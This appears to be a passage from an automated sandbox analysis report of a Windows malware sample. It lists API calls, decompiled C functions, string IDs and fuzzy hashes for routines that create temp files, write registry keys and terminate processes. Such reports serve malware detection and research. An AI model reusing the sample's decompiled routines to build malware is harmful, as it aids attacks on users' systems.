                              • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 010444F6
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 01044519
                              • DeleteFileA.KERNEL32(?,00003219), ref: 01044542
                              • HeapFree.KERNEL32(00000000,?), ref: 01044554
                              • HeapFree.KERNEL32(00000000,?,00003219), ref: 01044565
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 1078934163-0
                              • Opcode ID: 43fc631f365500760aa0ecbd0b2a58ff4feb5cc83c1a2536c7c877d378c4a975
                              • Instruction ID: f4a133181fca48f85e3dc330fe6f6ec84fc1b69ccf00313f5de33c06200510ef
                              • Instruction Fuzzy Hash: DF419DB1204306AFE721DF18DD84F5B7BE8AB88744F040469F6C4D7095DB76D909CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 01030BD9
                              • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 01030BEE
                              • memset.NTDLL ref: 01030BFB
                              • HeapFree.KERNEL32(00000000,00000000,?,01037329,0104FAE0,?,?,010501F4), ref: 01030C18
                              • memcpy.NTDLL(?,010501F4,?,?,01037329,0104FAE0,?,?,010501F4), ref: 01030C39
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Allocate$Freememcpymemset
                              • String ID: chun
                              • API String ID: 2362494589-3058818181
                              • Opcode ID: 22577810c90c5f2a61d89a8522944becc0147d5e50475aa0bb9c2284977a1175
                              • Instruction ID: 92e5aba4df8f8eb749e21bc5ad5bd5bc8e416d5212e32f93996429c74e72f1a8
                              • Opcode Fuzzy Hash: 22577810c90c5f2a61d89a8522944becc0147d5e50475aa0bb9c2284977a1175
                              • Instruction Fuzzy Hash: 4A31897550170AAFE730CF59C884A5BBBECEF44310F00482AF99ACB664D771E905CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 0103F498
                              • lstrcmpiW.KERNEL32(00000000,?), ref: 0103F4D0
                              • lstrcmpiW.KERNEL32(?,?), ref: 0103F4E5
                              • lstrlenW.KERNEL32(?), ref: 0103F4EC
                              • CloseHandle.KERNEL32(?), ref: 0103F514
                              • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 0103F540
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0103F55E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                              • String ID:
                              • API String ID: 1496873005-0
                              • Opcode ID: da43e392da724db24163ef6608814515f25d9f11d4118c39e593434cc72cd997
                              • Instruction ID: 2be535852ede14db9d4246b8e17305c77e6643fd68ab0d03403e14bfdfae7d5f
                              • Opcode Fuzzy Hash: da43e392da724db24163ef6608814515f25d9f11d4118c39e593434cc72cd997
                              • Instruction Fuzzy Hash: 252146B2A00206EBDB209F69DD84EAB7BFCBF45340B000564F686D2155EB35EA458B61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(010256DD,00000000,01050480,010504A0,?,?,010256DD,0102F5DF,01050480), ref: 01029028
                              • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0102903E
                              • lstrlen.KERNEL32(0102F5DF,?,?,010256DD,0102F5DF,01050480), ref: 01029046
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 01029052
                              • lstrcpy.KERNEL32(01050480,010256DD), ref: 01029068
                              • HeapFree.KERNEL32(00000000,00000000,?,?,010256DD,0102F5DF,01050480), ref: 010290BC
                              • HeapFree.KERNEL32(00000000,01050480,?,?,010256DD,0102F5DF,01050480), ref: 010290CB
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreelstrlen$lstrcpy
                              • String ID:
                              • API String ID: 1531811622-0
                              • Opcode ID: 14754753680ad17598477b16a1c7e74f221e3acaa3e5892d572ad4c46453b1e5
                              • Instruction ID: 8d62eaf8448f875a5b1c70e708a536f4db5b4f135fa11cba755c518af223ef11
                              • Opcode Fuzzy Hash: 14754753680ad17598477b16a1c7e74f221e3acaa3e5892d572ad4c46453b1e5
                              • Instruction Fuzzy Hash: 4421F235200358AFEB724F68DD84F6A7FAAEB86748F144099F9C557215C73B9C06C760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,010246AF,00000000), ref: 01043213
                                • Part of subcall function 01041FD9: lstrcpy.KERNEL32(-000000FC,00000000), ref: 01042013
                                • Part of subcall function 01041FD9: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,01043220,?,?,00000000,?,010246AF,00000000), ref: 01042025
                                • Part of subcall function 01041FD9: GetTickCount.KERNEL32 ref: 01042030
                                • Part of subcall function 01041FD9: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,01043220,?,?,00000000,?,010246AF,00000000), ref: 0104203C
                                • Part of subcall function 01041FD9: lstrcpy.KERNEL32(00000000), ref: 01042056
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • lstrcpy.KERNEL32(00000000), ref: 0104324E
                              • wsprintfA.USER32 ref: 01043261
                              • GetTickCount.KERNEL32 ref: 01043276
                              • wsprintfA.USER32 ref: 0104328B
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                              • String ID: "%S"
                              • API String ID: 1152860224-1359967185
                              • Opcode ID: 31edf60b52dfc52be42f91efa00747d031fbbc6bbcc3903ebc689518ef2381a7
                              • Instruction ID: c621772789effd0f9ec00da633a32ad2fdefad4841d35915326c1a2d1f43816c
                              • Opcode Fuzzy Hash: 31edf60b52dfc52be42f91efa00747d031fbbc6bbcc3903ebc689518ef2381a7
                              • Instruction Fuzzy Hash: 1F11A2F6501226BBD3207B689D88EAF7B9CEF95250B054425FAC597101DA79980087B1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0102F001: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0102F00D
                                • Part of subcall function 0102F001: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0102F023
                                • Part of subcall function 0102F001: _snwprintf.NTDLL ref: 0102F048
                                • Part of subcall function 0102F001: CreateFileMappingW.KERNEL32(000000FF,01050244,00000004,00000000,00001000,?), ref: 0102F064
                                • Part of subcall function 0102F001: GetLastError.KERNEL32 ref: 0102F076
                                • Part of subcall function 0102F001: CloseHandle.KERNEL32(00000000), ref: 0102F0AE
                              • UnmapViewOfFile.KERNEL32(?,?,?), ref: 0102103B
                              • CloseHandle.KERNEL32(?), ref: 01021044
                              • SetEvent.KERNEL32(?,?,?), ref: 0102108B
                              • GetLastError.KERNEL32(01041BD5,00000000,00000000), ref: 010210BA
                              • CloseHandle.KERNEL32(00000000,01041BD5,00000000,00000000), ref: 010210CA
                                • Part of subcall function 010347C6: lstrlenW.KERNEL32(80000001,761506E0,01048A01,80000001,?,?,0102360B,?), ref: 010347D2
                                • Part of subcall function 010347C6: memcpy.NTDLL(00000000,00000002,00000000,00000002,?,?,0102360B,?), ref: 010347FA
                                • Part of subcall function 010347C6: memset.NTDLL ref: 0103480C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                              • String ID: is p
                              • API String ID: 1106445334-4099728386
                              • Opcode ID: b25b4e7059cbc2c1320fa6f0c63846b76c7c4f9d980bc277ee3eab3f51284181
                              • Instruction ID: cad732b61ae8c76b3e86beb0aaf7ed445fe7cc7158537ec7bbb0ea3fb49b17ae
                              • Opcode Fuzzy Hash: b25b4e7059cbc2c1320fa6f0c63846b76c7c4f9d980bc277ee3eab3f51284181
                              • Instruction Fuzzy Hash: 5721C575740315AFD761AF78DD84B5F7BE8AB40320B010568FAC1D3154EBBAE8008BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D62B
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D644
                                • Part of subcall function 0103D619: GetCurrentThreadId.KERNEL32 ref: 0103D651
                                • Part of subcall function 0103D619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01042F93,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 0103D65D
                                • Part of subcall function 0103D619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D66B
                                • Part of subcall function 0103D619: lstrcpy.KERNEL32(00000000), ref: 0103D68D
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00001ED2,00000000,000000B7,?,00000001,0102548D,00000000,00000000,00000011), ref: 01044DFC
                              • HeapFree.KERNEL32(00000000,00000000,00001ED2,00000000,000000B7,?,00000001,0102548D,00000000,00000000,00000011), ref: 01044E6F
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 2078930461-0
                              • Opcode ID: 629bfa7ab81fd9f64055ca901ac45e2b00d2676133d2d7f55f676c3c0ef7b525
                              • Instruction ID: 78e07250c4ccb4efe7f5ca196ce865dc94edcd360dfef1e52a1451ecf2d9b7ec
                              • Opcode Fuzzy Hash: 629bfa7ab81fd9f64055ca901ac45e2b00d2676133d2d7f55f676c3c0ef7b525
                              • Instruction Fuzzy Hash: 991127B5284314FBD3322A65ACCCF6F3F9DEB447A0F000121F6C2D6095D66B4814C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01043EEB: lstrlen.KERNEL32(00000000,00000000,770CC740,74785520,?,?,?,01030B29,?,00000000,770CC740,74785520,?,?,0103F27A), ref: 01043F52
                                • Part of subcall function 01043EEB: sprintf.NTDLL ref: 01043F73
                              • lstrlen.KERNEL32(00000000,?,00000000,770CC740,74785520,?,?,0103F27A,?,04B3C0E0), ref: 01030B3A
                              • lstrlen.KERNEL32(?,?,?,0103F27A,?,04B3C0E0), ref: 01030B42
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • strcpy.NTDLL ref: 01030B59
                              • lstrcat.KERNEL32(00000000,?), ref: 01030B64
                                • Part of subcall function 01045461: lstrlen.KERNEL32(?,?,0103F27A,0103F27A,00000001,00000000,00000000,?,01030B73,00000000,0103F27A,?,?,0103F27A,?,04B3C0E0), ref: 01045478
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,0103F27A,?,?,0103F27A,?,04B3C0E0), ref: 01030B81
                                • Part of subcall function 0103D7A9: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,01030B8D,00000000,?,?,0103F27A,?,04B3C0E0), ref: 0103D7B3
                                • Part of subcall function 0103D7A9: _snprintf.NTDLL ref: 0103D811
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                              • String ID: =
                              • API String ID: 2864389247-1428090586
                              • Opcode ID: 7b7f3dddf052aa5c8ea763f49d74fe8874adafe5b5353ca1df8c004dc4908ec8
                              • Instruction ID: ba60cb335c4991649a03650331c2b48a18f9dc87316a3ad562ad313bb91a0b79
                              • Opcode Fuzzy Hash: 7b7f3dddf052aa5c8ea763f49d74fe8874adafe5b5353ca1df8c004dc4908ec8
                              • Instruction Fuzzy Hash: 2E11E3B76022267B9B227BA89CC4CEF3AAC9EC56543050075FAC0DB204DE7ADC0183E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 64%
                              			E013EA7FB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                              				intOrPtr _v8;
                              				intOrPtr _t9;
                              				intOrPtr _t13;
                              				char* _t28;
                              				void* _t33;
                              				void* _t34;
                              				char* _t36;
                              				intOrPtr* _t40;
                              				char* _t41;
                              				char* _t42;
                              				char* _t43;
                              
                              				_t34 = __edx;
                              				_push(__ecx);
                              				_t9 =  *0x13ed2b8; // 0x26ea5a8
                              				_t1 = _t9 + 0x13ee62c; // 0x253d7325
                              				_t36 = 0;
                              				_t28 = E013E2262(__ecx, _t1);
                              				if(_t28 != 0) {
                              					_t40 = __imp__;
                              					_t13 =  *_t40(_t28);
                              					_v8 = _t13;
                              					_t6 =  *_t40(_a4) + 1; // 0x3ad95b1
                              					_t41 = E013E55DC(_v8 + _t6);
                              					if(_t41 != 0) {
                              						strcpy(_t41, _t28);
                              						_pop(_t33);
                              						__imp__(_t41, _a4);
                              						_t36 = E013E66FF(_t34, _t41, _a8);
                              						E013E6DFA(_t41);
                              						_t42 = E013E4024(StrTrimA(_t36, "="), _t36);
                              						if(_t42 != 0) {
                              							E013E6DFA(_t36);
                              							_t36 = _t42;
                              						}
                              						_t43 = E013E484D(_t36, _t33);
                              						if(_t43 != 0) {
                              							E013E6DFA(_t36);
                              							_t36 = _t43;
                              						}
                              					}
                              					E013E6DFA(_t28);
                              				}
                              				return _t36;
                               			}

                              APIs
                                • Part of subcall function 013E2262: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,013EA815,253D7325,00000000,00000000,?,?,74785520,013E64DC), ref: 013E22C9
                                • Part of subcall function 013E2262: sprintf.NTDLL ref: 013E22EA
                              • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,?,?,74785520,013E64DC,?,03AD95B0), ref: 013EA826
                              • lstrlen.KERNEL32(?,?,74785520,013E64DC,?,03AD95B0), ref: 013EA82E
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • strcpy.NTDLL ref: 013EA845
                              • lstrcat.KERNEL32(00000000,?), ref: 013EA850
                                • Part of subcall function 013E66FF: lstrlen.KERNEL32(?,?,013E64DC,013E64DC,00000001,00000000,00000000,?,013EA85F,00000000,013E64DC,?,74785520,013E64DC,?,03AD95B0), ref: 013E6716
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,013E64DC,?,74785520,013E64DC,?,03AD95B0), ref: 013EA86D
                                • Part of subcall function 013E4024: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,013EA879,00000000,?,74785520,013E64DC,?,03AD95B0), ref: 013E402E
                                • Part of subcall function 013E4024: _snprintf.NTDLL ref: 013E408C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                               • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                               • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                               • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                               • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                              • String ID: =
                              • API String ID: 2864389247-1428090586
                              • Opcode ID: 4b2d23052f3df2015a2d1074031b7a546fb4fd1fe4123aaa04d73e32f8cbfb39
                              • Instruction ID: 9adb0c6d48a4e4febb8f454ce675734ede66568064512199a549408fd0c1ad8f
                              • Opcode Fuzzy Hash: 4b2d23052f3df2015a2d1074031b7a546fb4fd1fe4123aaa04d73e32f8cbfb39
                              • Instruction Fuzzy Hash: 3011CA77501336A7C62277BD9C5CCAF3FED9E6566C7094125F605AB280DE35DC0247A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SwitchToThread.KERNEL32(?,?,01042516), ref: 01025DB6
                              • CloseHandle.KERNEL32(?,?,01042516), ref: 01025DC2
                              • CloseHandle.KERNEL32(00000000,747DF720,?,01042320,00000000,?,?,?,01042516), ref: 01025DD4
                              • memset.NTDLL ref: 01025DEB
                              • memset.NTDLL ref: 01025E02
                              • memset.NTDLL ref: 01025E19
                              • memset.NTDLL ref: 01025E30
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memset$CloseHandle$SwitchThread
                              • String ID:
                              • API String ID: 3699883640-0
                              • Opcode ID: 06710d2b3aa64fefbdb651742cebc1a8665ebe810c46f0e930fd419bdb49d711
                              • Instruction ID: a7da55542c522351beb938872967466cf0b30713479e583c0eb5013bb28f76c3
                              • Opcode Fuzzy Hash: 06710d2b3aa64fefbdb651742cebc1a8665ebe810c46f0e930fd419bdb49d711
                              • Instruction Fuzzy Hash: 7911C4B1981235B7D77137299C48DCF3A6CAFE1700F144025F5C8A710EE76A490187A9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0103291E
                              • wcstombs.NTDLL ref: 0103292F
                                • Part of subcall function 0102881B: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,01023177,00000000,?,00000000,?,?,?,?,?,?), ref: 0102882D
                                • Part of subcall function 0102881B: StrChrA.SHLWAPI(?,00000020,?,00000000,01023177,00000000,?,00000000,?,?,?,?,?,?), ref: 0102883C
                              • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 01032950
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0103295F
                              • CloseHandle.KERNEL32(00000000), ref: 01032966
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01032975
                              • WaitForSingleObject.KERNEL32(00000000), ref: 01032985
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                              • String ID:
                              • API String ID: 417118235-0
                              • Opcode ID: 530388f8c9b60844101e76b41511b764241a59e6449f0aa42b84976f450b030c
                              • Instruction ID: 9dc6db3a7c4ca52141746713d75b3cf9c0f9e3c8294e9c79a18c470e1ed26333
                              • Opcode Fuzzy Hash: 530388f8c9b60844101e76b41511b764241a59e6449f0aa42b84976f450b030c
                              • Instruction Fuzzy Hash: 04110175200216FBE7705B58DE88FAE7FADFF00791F000011FA86A6194C7BAD854CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D62B
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D644
                                • Part of subcall function 0103D619: GetCurrentThreadId.KERNEL32 ref: 0103D651
                                • Part of subcall function 0103D619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01042F93,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 0103D65D
                                • Part of subcall function 0103D619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D66B
                                • Part of subcall function 0103D619: lstrcpy.KERNEL32(00000000), ref: 0103D68D
                              • lstrcpy.KERNEL32(-000000FC,00000000), ref: 01042013
                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,01043220,?,?,00000000,?,010246AF,00000000), ref: 01042025
                              • GetTickCount.KERNEL32 ref: 01042030
                              • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,01043220,?,?,00000000,?,010246AF,00000000), ref: 0104203C
                              • lstrcpy.KERNEL32(00000000), ref: 01042056
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                              • String ID: \Low
                              • API String ID: 1629304206-4112222293
                              • Opcode ID: 159eac05c0a08c371372e55230635af79c2ed82fcabe2d29929f13b8f974496c
                              • Instruction ID: 2e6bac8571b84be42ef31e6d82bd618718167175f10e2400e46bf40ebe419b52
                              • Opcode Fuzzy Hash: 159eac05c0a08c371372e55230635af79c2ed82fcabe2d29929f13b8f974496c
                              • Instruction Fuzzy Hash: 1001D2B1301615ABE3316A79ADC8FAB7BDCEF05741B010075F691D7046DB2AD901C7B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(0102F5DF,00000000,00000000,010504A0,?,?,010256EC,0102F5DF,00000000,0102F5DF,01050480), ref: 0103D90C
                              • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0103D91A
                              • wsprintfA.USER32 ref: 0103D936
                              • RegCreateKeyA.ADVAPI32(80000001,01050480,00000000), ref: 0103D94E
                              • lstrlen.KERNEL32(?), ref: 0103D95D
                              • RegCloseKey.ADVAPI32(?), ref: 0103D976
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0103D985
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heaplstrlen$AllocateCloseCreateFreewsprintf
                              • String ID:
                              • API String ID: 3908752696-0
                              • Opcode ID: 651ebbc6df17aea18badfe3a5084d376286e05b569bb50ce33e7004b0713f36a
                              • Instruction ID: 2c89815649bf5229ee000cfe68cee1767b735f628e3f54ca99073ca56f9f0ca5
                              • Opcode Fuzzy Hash: 651ebbc6df17aea18badfe3a5084d376286e05b569bb50ce33e7004b0713f36a
                              • Instruction Fuzzy Hash: 0D118EBA200209FFEB215B98ED88EAB3B7EEB45304F004025FA81D6164DA779D14DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • wsprintfA.USER32 ref: 0102B03C
                              • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 0102B04E
                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0102B078
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0102B08B
                              • CloseHandle.KERNEL32(?), ref: 0102B094
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                              • String ID: 0x%08X
                              • API String ID: 603522830-3182613153
                              • Opcode ID: 5f0fa91bbbb0a0188009bd1f1d7564a66cf1ce072b0cdf307afddb29c5c40e32
                              • Instruction ID: d7a6488eb076cc2e5666e165281bba6f364f2fbdccbefba2a786e381a515df49
                              • Opcode Fuzzy Hash: 5f0fa91bbbb0a0188009bd1f1d7564a66cf1ce072b0cdf307afddb29c5c40e32
                              • Instruction Fuzzy Hash: 20015EB1900129BBDB109BA5DD89DEF7FBCEF05361F004158F5A6E2185D7799601CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • GetLastError.KERNEL32(?,?,?,00001000,?,01050354,747DF750), ref: 01046A86
                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,01050354,747DF750), ref: 01046B0B
                              • CloseHandle.KERNEL32(00000000,?,01050354,747DF750), ref: 01046B25
                              • OpenProcess.KERNEL32(00100000,00000000,00000000,?,01050354,747DF750), ref: 01046B5A
                                • Part of subcall function 01025F87: RtlReAllocateHeap.NTDLL(00000000,00000000,00000000,01045E73), ref: 01025F97
                              • WaitForSingleObject.KERNEL32(?,00000064,?,01050354,747DF750), ref: 01046BDC
                              • CloseHandle.KERNEL32(F0FFC983,?,01050354,747DF750), ref: 01046C03
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                              • String ID:
                              • API String ID: 3115907006-0
                              • Opcode ID: 479d6f15765b3121b321b86601815cf712ca2202795fe8a645aceb267bea4dee
                              • Instruction ID: 2851412c70c3b6f7eb9d447f0fb2bb9fa190e4ca68a7a01a546da37fd38181a0
                              • Opcode Fuzzy Hash: 479d6f15765b3121b321b86601815cf712ca2202795fe8a645aceb267bea4dee
                              • Instruction Fuzzy Hash: 9D8118B1E00219EFDB11DF98C984AEDBBB5FF09300F1484A5E985AB251E736AD50CF94

                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • FileTimeToLocalFileTime.KERNEL32(00000000,010257F0), ref: 0103DCCD
                              • FileTimeToSystemTime.KERNEL32(010257F0,?), ref: 0103DCDB
                              • lstrlenW.KERNEL32(00000010), ref: 0103DCEB
                              • lstrlenW.KERNEL32(00000218), ref: 0103DCF7
                              • FileTimeToLocalFileTime.KERNEL32(00000008,010257F0), ref: 0103DDE4
                              • FileTimeToSystemTime.KERNEL32(010257F0,?), ref: 0103DDF2
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                              • API String ID: 1122361434-0
                              • Opcode ID: e4a6036b1f2a2d0d116b1cc8bd8f6daeb9d173dbebaeae0e92f965d74fc7eba8
                              • Instruction ID: 036f81737ec93fd8d09b475240992f658901c283bf50e6dc07f518e04aa3aa90
                              • Opcode Fuzzy Hash: e4a6036b1f2a2d0d116b1cc8bd8f6daeb9d173dbebaeae0e92f965d74fc7eba8
                              • Instruction Fuzzy Hash: 36711EB190021AEBCB60DFE9C984AEEB7FCFB48304F544466F685D7240E7399A45CB60

                              APIs
                              • StrChrA.SHLWAPI(?,00000020), ref: 01024922
                              • StrChrA.SHLWAPI(00000001,00000020), ref: 01024933
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 01024973
                              • memcpy.NTDLL(00000000,?,00000007), ref: 010249A0
                              • memcpy.NTDLL(00000000,?,?,00000000,?,00000007), ref: 010249AF
                              • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007), ref: 010249C1
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy$AllocateHeap
                              • API String ID: 4068229299-0
                              • Opcode ID: e51dc977a08744e3a746f8e06bdb30cabf8845b02fa65671dbf771a5a457df3f
                              • Instruction ID: 0a04543dcfa98fb787d86c052ad0dc4e4150cd7a2d0a4ea4c646d3ce2bc3874d
                              • Opcode Fuzzy Hash: e51dc977a08744e3a746f8e06bdb30cabf8845b02fa65671dbf771a5a457df3f
                              • Instruction Fuzzy Hash: 9451F3315042D5AFC7528F78C8E5BEA7FB8EF47218B2980D9E8C5CE022E6229947C750

                              APIs
                              • GetModuleHandleA.KERNEL32(00000000,?), ref: 01044AF0
                              • GetLastError.KERNEL32 ref: 01044B16
                              • SetEvent.KERNEL32(00000000), ref: 01044B29
                              • GetModuleHandleA.KERNEL32(00000000), ref: 01044B72
                              • memset.NTDLL ref: 01044B87
                              • RtlExitUserThread.NTDLL(?), ref: 01044BBC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                              • API String ID: 3978817377-0
                              • Opcode ID: e85bdc7fadccf03aea3077fe5acc2d153ce71a39f92b1dbed730d1da883761ed
                              • Instruction ID: 923f4ec7b4826645fac43f9e4413f26a1419cb6ff3176c84ac9523d8f735ea31
                              • Opcode Fuzzy Hash: e85bdc7fadccf03aea3077fe5acc2d153ce71a39f92b1dbed730d1da883761ed
